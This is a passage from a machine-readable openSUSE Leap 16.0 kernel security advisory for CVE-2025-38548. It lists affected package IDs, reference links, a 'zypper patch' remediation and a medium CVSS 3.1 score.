"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38548",
"url": "https://www.suse.com/security/cve/CVE-2025-38548"
},
{
"category": "external",
"summary": "SUSE Bug 1248228 for CVE-2025-38548",
"url": "https://bugzilla.suse.com/1248228"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
